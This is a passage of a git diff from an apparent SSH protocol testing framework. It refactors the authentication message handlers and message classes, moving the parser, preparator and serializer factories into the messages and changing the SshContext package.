(verifyingSignature.verify( - this.prepareSignatureInput(), signature.getSignatureBytes())) { + this.prepareSignatureInput(message), signature.getSignatureBytes())) { LOGGER.info("Signature verification successful: Signature is valid."); } else { LOGGER.warn( @@ -67,7 +64,7 @@ public void checkSignature() { } } - public byte[] prepareSignatureInput() { + public byte[] prepareSignatureInput(UserAuthHostbasedMessage message) { return ArrayConverter.concatenate( Converter.bytesToLengthPrefixedBinaryString( context.getSessionID().orElse(new byte[] {})), @@ -82,24 +79,4 @@ public byte[] prepareSignatureInput() { Converter.bytesToLengthPrefixedBinaryString( message.getClientUserName().getValue().getBytes(StandardCharsets.UTF_8))); } - - @Override - public UserAuthHostbasedMessageParser getParser(byte[] array) { - return new UserAuthHostbasedMessageParser(array); - } - - @Override - public UserAuthHostbasedMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthHostbasedMessageParser(array, startPosition); - } - - @Override - public UserAuthHostbasedMessagePreparator getPreparator() { - return new UserAuthHostbasedMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthHostbasedMessageSerializer getSerializer() { - return new UserAuthHostbasedMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoRequestMessageHandler.java index 57b72cbff..689833122 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoRequestMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthInfoRequestMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthInfoRequestMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthInfoRequestMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthInfoRequestMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthInfoRequestMessageHandler extends SshMessageHandler { @@ -21,31 +18,11 @@ public UserAuthInfoRequestMessageHandler(SshContext context) { super(context); } - public UserAuthInfoRequestMessageHandler( + /*public UserAuthInfoRequestMessageHandler( SshContext context, UserAuthInfoRequestMessage message) { super(context, message); - } - - @Override - public void adjustContext() {} + }*/ @Override - public UserAuthInfoRequestMessageParser getParser(byte[] array) { - return new UserAuthInfoRequestMessageParser(array); - } - - @Override - public UserAuthInfoRequestMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthInfoRequestMessageParser(array, startPosition); - } - - @Override - public UserAuthInfoRequestMessagePreparator getPreparator() { - return new UserAuthInfoRequestMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthInfoRequestMessageSerializer getSerializer() { - return new UserAuthInfoRequestMessageSerializer(message); - } + public void adjustContext(UserAuthInfoRequestMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoResponseMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoResponseMessageHandler.java index e111648a4..e0de98fa7 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoResponseMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthInfoResponseMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthInfoResponseMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthInfoResponseMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthInfoResponseMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthInfoResponseMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthInfoResponseMessageHandler extends SshMessageHandler { @@ -21,31 +18,11 @@ public UserAuthInfoResponseMessageHandler(SshContext context) { super(context); } - public UserAuthInfoResponseMessageHandler( + /*public UserAuthInfoResponseMessageHandler( SshContext context, UserAuthInfoResponseMessage message) { super(context, message); - } - - @Override - public void adjustContext() {} + }*/ @Override - public UserAuthInfoResponseMessageParser getParser(byte[] array) { - return new UserAuthInfoResponseMessageParser(array); - } - - @Override - public UserAuthInfoResponseMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthInfoResponseMessageParser(array, startPosition); - } - - @Override - public UserAuthInfoResponseMessagePreparator getPreparator() { - return new UserAuthInfoResponseMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthInfoResponseMessageSerializer getSerializer() { - return new UserAuthInfoResponseMessageSerializer(message); - } + public void adjustContext(UserAuthInfoResponseMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthKeyboardInteractiveMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthKeyboardInteractiveMessageHandler.java index b2921cf6b..7545866af 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthKeyboardInteractiveMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthKeyboardInteractiveMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthKeyboardInteractiveMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthKeyboardInteractiveMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthKeyboardInteractiveMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthKeyboardInteractiveMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthKeyboardInteractiveMessageHandler extends SshMessageHandler { @@ -21,31 +18,11 @@ public UserAuthKeyboardInteractiveMessageHandler(SshContext context) { super(context); } - public UserAuthKeyboardInteractiveMessageHandler( + /*public UserAuthKeyboardInteractiveMessageHandler( SshContext context, UserAuthKeyboardInteractiveMessage message) { super(context, message); - } + }*/ // ToDo Handle UserAuthKeyboardInteractive @Override - public void adjustContext() {} - - @Override - public UserAuthKeyboardInteractiveMessageParser getParser(byte[] array) { - return new UserAuthKeyboardInteractiveMessageParser(array); - } - - @Override - public UserAuthKeyboardInteractiveMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthKeyboardInteractiveMessageParser(array, startPosition); - } - - @Override - public UserAuthKeyboardInteractiveMessagePreparator getPreparator() { - return new UserAuthKeyboardInteractiveMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthKeyboardInteractiveMessageSerializer getSerializer() { - return new UserAuthKeyboardInteractiveMessageSerializer(message); - } + public void adjustContext(UserAuthKeyboardInteractiveMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthNoneMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthNoneMessageHandler.java index e9a860d9d..231b3c487 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthNoneMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthNoneMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthNoneMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthNoneMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthNoneMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthNoneMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthNoneMessageHandler extends SshMessageHandler { @@ -20,32 +17,12 @@ public UserAuthNoneMessageHandler(SshContext context) { super(context); } - public UserAuthNoneMessageHandler(SshContext context, UserAuthNoneMessage message) { + /*public UserAuthNoneMessageHandler(SshContext context, UserAuthNoneMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthNoneMessage message) { // TODO: Handle UserAuthNoneMessage } - - @Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthNoneMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthNoneMessageParser(array, startPosition); - } - - @Override - public UserAuthNoneMessagePreparator getPreparator() { - return new UserAuthNoneMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthNoneMessageSerializer getSerializer() { - return new UserAuthNoneMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPasswordMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPasswordMessageHandler.java index c831f13f7..051c0c0b8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPasswordMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPasswordMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthPasswordMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPasswordMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPasswordMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthPasswordMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthPasswordMessageHandler extends SshMessageHandler { @@ -20,32 +17,12 @@ public UserAuthPasswordMessageHandler(SshContext context) { super(context); } - public UserAuthPasswordMessageHandler(SshContext context, UserAuthPasswordMessage message) { + /*public UserAuthPasswordMessageHandler(SshContext context, UserAuthPasswordMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthPasswordMessage message) { // TODO: Handle UserAuthPasswordMessage } - - @Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthPasswordMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPasswordMessageParser(array, startPosition); - } - - @Override - public UserAuthPasswordMessagePreparator getPreparator() { - return new UserAuthPasswordMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthPasswordMessageSerializer getSerializer() { - return new UserAuthPasswordMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPkOkMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPkOkMessageHandler.java index 110087f2b..d47f0d05b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPkOkMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPkOkMessageHandler.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; -import de.rub.nds.sshattacker.core.exceptions.NotImplementedException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthPkOkMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPkOkMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthPkOkMessageHandler extends SshMessageHandler { @@ -21,30 +17,10 @@ public UserAuthPkOkMessageHandler(SshContext context) { super(context); } - public UserAuthPkOkMessageHandler(SshContext context, UserAuthPkOkMessage message) { + /*public UserAuthPkOkMessageHandler(SshContext context, UserAuthPkOkMessage message) { super(context, message); - } - - @Override - public void adjustContext() {} + }*/ @Override - public UserAuthPkOkMessageParser getParser(byte[] array) { - return new UserAuthPkOkMessageParser(array); - } - - @Override - public UserAuthPkOkMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPkOkMessageParser(array, startPosition); - } - - @Override - public SshMessagePreparator getPreparator() { - throw new NotImplementedException("UserAuthPkOkMessageHandler::getPreparator"); - } - - @Override - public SshMessageSerializer getSerializer() { - throw new NotImplementedException("UserAuthPkOkMessageHandler::getSerializer"); - } + public void adjustContext(UserAuthPkOkMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPubkeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPubkeyMessageHandler.java index 98f03dc94..33efb7674 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPubkeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthPubkeyMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthPubkeyMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthPubkeyMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPubkeyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthPubkeyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthPubkeyMessageHandler extends SshMessageHandler { @@ -20,30 +17,10 @@ public UserAuthPubkeyMessageHandler(SshContext context) { super(context); } - public UserAuthPubkeyMessageHandler(SshContext context, UserAuthPubkeyMessage message) { + /*public UserAuthPubkeyMessageHandler(SshContext context, UserAuthPubkeyMessage message) { super(context, message); - } - - @Override - public void adjustContext() {} + }*/ @Override - public UserAuthPubkeyMessageParser getParser(byte[] array) { - return new UserAuthPubkeyMessageParser(array); - } - - @Override - public UserAuthPubkeyMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPubkeyMessageParser(array, startPosition); - } - - @Override - public UserAuthPubkeyMessagePreparator getPreparator() { - return new UserAuthPubkeyMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthPubkeyMessageSerializer getSerializer() { - return new UserAuthPubkeyMessageSerializer(message); - } + public void adjustContext(UserAuthPubkeyMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java index 61c741a88..24fe625af 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthSuccessMessageHandler.java @@ -8,12 +8,9 @@ package de.rub.nds.sshattacker.core.protocol.authentication.handler; import de.rub.nds.sshattacker.core.constants.CompressionMethod; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthSuccessMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthSuccessMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthSuccessMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthSuccessMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; public class UserAuthSuccessMessageHandler extends SshMessageHandler @@ -23,12 +20,12 @@ public UserAuthSuccessMessageHandler(SshContext context) { super(context); } - public UserAuthSuccessMessageHandler(SshContext context, UserAuthSuccessMessage message) { + /*public UserAuthSuccessMessageHandler(SshContext context, UserAuthSuccessMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthSuccessMessage message) { // Enable delayed compression if negotiated activateCompression(); } @@ -52,24 +49,4 @@ private void activateCompression() { chooser.getCompressionMethodServerToClient().getAlgorithm()); } } - - @Override - public UserAuthSuccessMessageParser getParser(byte[] array) { - return new UserAuthSuccessMessageParser(array); - } - - @Override - public UserAuthSuccessMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthSuccessMessageParser(array, startPosition); - } - - @Override - public UserAuthSuccessMessagePreparator getPreparator() { - return new UserAuthSuccessMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthSuccessMessageSerializer getSerializer() { - return new UserAuthSuccessMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthUnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthUnknownMessageHandler.java index 0e8ee0027..74497aa64 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthUnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/UserAuthUnknownMessageHandler.java @@ -7,13 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.authentication.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthUnknownMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthUnknownMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthUnknownMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.state.SshContext; public class UserAuthUnknownMessageHandler extends SshMessageHandler { @@ -21,32 +17,12 @@ public UserAuthUnknownMessageHandler(SshContext context) { super(context); } - public UserAuthUnknownMessageHandler(SshContext context, UserAuthUnknownMessage message) { + /*public UserAuthUnknownMessageHandler(SshContext context, UserAuthUnknownMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UserAuthUnknownMessage message) { // TODO: Handle UserAuthUnknownMessage } - - @Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthUnknownMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthUnknownMessageParser(array, startPosition); - } - - @Override - public UserAuthUnknownMessagePreparator getPreparator() { - return new UserAuthUnknownMessagePreparator(context.getChooser(), message); - } - - @Override - public UserAuthUnknownMessageSerializer getSerializer() { - return new UserAuthUnknownMessageSerializer(message); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java index 010d7187c..b0786458f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java @@ -8,11 +8,17 @@ package de.rub.nds.sshattacker.core.protocol.authentication.message; import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.ModifiableVariableProperty; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthBannerMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthBannerMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthBannerMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthBannerMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthBannerMessage extends SshMessage { @@ -22,6 +28,23 @@ public class UserAuthBannerMessage extends SshMessage { private ModifiableInteger languageTagLength; private ModifiableString languageTag; + public ModifiableByteArray getData() { + return data; + } + + public void setData(ModifiableByteArray data) { + this.data = data; + } + + public void setData(byte[] data) { + if (this.data == null) { + this.data = new ModifiableByteArray(); + } + this.data.setOriginalValue(data); + } + + @ModifiableVariableProperty private ModifiableByteArray data; + public ModifiableInteger getMessageLength() { return messageLength; } @@ -104,6 +127,26 @@ public void setLanguageTag(String languageTag, boolean adjustLengthField) { @Override public UserAuthBannerMessageHandler getHandler(SshContext context) { - return new UserAuthBannerMessageHandler(context, this); + return new UserAuthBannerMessageHandler(context); + } + + @Override + public UserAuthBannerMessagePreparator getPreparator(SshContext sshContext) { + return new UserAuthBannerMessagePreparator(sshContext.getChooser(), this); + } + + @Override + public UserAuthBannerMessageSerializer getSerializer(SshContext sshContext) { + return new UserAuthBannerMessageSerializer(this); + } + + @Override + public UserAuthBannerMessageParser getParser(SshContext sshContext, InputStream stream) { + return new UserAuthBannerMessageParser(stream); + } + + @Override + public String toShortString() { + return "AUTHBANNER"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java index c1d48f64d..5beb28883 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java @@ -13,10 +13,14 @@ import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.constants.AuthenticationMethod; import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthFailureMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthFailureMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthFailureMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthFailureMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; @@ -125,6 +129,36 @@ public void setPartialSuccess(boolean partialSuccess) { @Override public UserAuthFailureMessageHandler getHandler(SshContext context) { - return new UserAuthFailureMessageHandler(context, this); + return new UserAuthFailureMessageHandler(context); + } + + @Override + public UserAuthFailureMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthFailureMessageParser(stream); + } + + /*@Override + public UserAuthFailureMessageParser getParser(byte[] array) { + return new UserAuthFailureMessageParser(array); + } + + @Override + public UserAuthFailureMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthFailureMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthFailureMessagePreparator getPreparator(SshContext context) { + return new UserAuthFailureMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthFailureMessageSerializer getSerializer(SshContext context) { + return new UserAuthFailureMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTHFAIL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java index 63b02854c..e33b32a6a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthHostbasedMessage.java @@ -13,10 +13,14 @@ import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthHostbasedMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthHostbasedMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthHostbasedMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthHostbasedMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.ExchangeHashSignatureMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.HostKeyMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthHostbasedMessage extends UserAuthRequestMessage @@ -263,6 +267,37 @@ public void setSignature(byte[] signature, boolean adjustLengthField) { @Override public UserAuthHostbasedMessageHandler getHandler(SshContext context) { - return new UserAuthHostbasedMessageHandler(context, this); + return new UserAuthHostbasedMessageHandler(context); + } + + @Override + public UserAuthHostbasedMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthHostbasedMessageParser(stream); + } + + /* + @Override + public UserAuthHostbasedMessageParser getParser(byte[] array) { + return new UserAuthHostbasedMessageParser(array); + } + + @Override + public UserAuthHostbasedMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthHostbasedMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthHostbasedMessagePreparator getPreparator(SshContext context) { + return new UserAuthHostbasedMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthHostbasedMessageSerializer getSerializer(SshContext context) { + return new UserAuthHostbasedMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_HOST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java index 1d167c54f..c6f0f0e7f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java @@ -10,10 +10,14 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.AuthenticationPrompt; import de.rub.nds.sshattacker.core.protocol.authentication.handler.UserAuthInfoRequestMessageHandler; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.UserAuthInfoRequestMessageParser; +import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthInfoRequestMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.authentication.serializer.UserAuthInfoRequestMessageSerializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; -import de.rub.nds.sshattacker.core.state.SshContext; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class UserAuthInfoRequestMessage extends SshMessage { @@ -171,6 +175,35 @@ public void setPrompt(AuthenticationPrompt prompt) { @Override public UserAuthInfoRequestMessageHandler getHandler(SshContext context) { - return new UserAuthInfoRequestMessageHandler(context, this); + return new UserAuthInfoRequestMessageHandler(context); + } + + @Override + public UserAuthInfoRequestMessageParser getParser(SshContext context, InputStream stream) { + return new UserAuthInfoRequestMessageParser(stream); + } + /*@Override + public UserAuthInfoRequestMessageParser getParser(byte[] array) { + return new UserAuthInfoRequestMessageParser(array); + } + + @Override + public UserAuthInfoRequestMessageParser getParser(byte[] array, int startPosition) { + return new UserAuthInfoRequestMessageParser(array, startPosition); + }*/ + + @Override + public UserAuthInfoRequestMessagePreparator getPreparator(SshContext context) { + return new UserAuthInfoRequestMessagePreparator(context.getChooser(), this); + } + + @Override + public UserAuthInfoRequestMessageSerializer getSerializer(SshContext context) { + return new UserAuthInfoRequestMessageSerializer(this); + } + + @Override + public String toShortString() { + return "AUTH_INFO_REQUEST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoResponseMessage.java index 